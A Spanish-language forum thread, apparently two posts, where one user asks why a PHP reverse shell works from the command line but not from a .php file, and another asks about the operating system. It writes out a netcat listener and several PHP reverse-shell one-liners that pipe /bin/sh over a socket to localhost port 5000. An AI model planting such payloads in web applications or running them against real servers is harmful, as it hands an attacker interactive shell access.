Hola foro tengo una duda

si pongo netcat a la escucha en el puerto 5000:

netcat -l -p 5000 -vv

y en otra terminal ejecuto esto:

php -r '$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");'

me devuelve una shell, Todo correcto ahora si creo una archivo.php y hago esto:
 //NO ME FUNCIONA, No devuelve la shell

 
        <?php
 
       $ultima_linea = system("php -r '\$sock=fsockopen(\"127.0.0.1\",5000);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",$retval);
        ?>        

o esto:
       
        //NO ME FUNCIONA, No devuelve la shell, Péeero si conecta....
       

 <?php
        $sock=fsockopen(127.0.0.1, 5000);
        exec("/bin/sh -i <&3 >&3 2>&3");
        ?>

estas seguro que te conecta teniendo netcat a la escucha?

<php system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\''); ?>
 

por que acabo de probarlo en un OS X y no me funcionó.

en que S.O. tienes el servidor con php?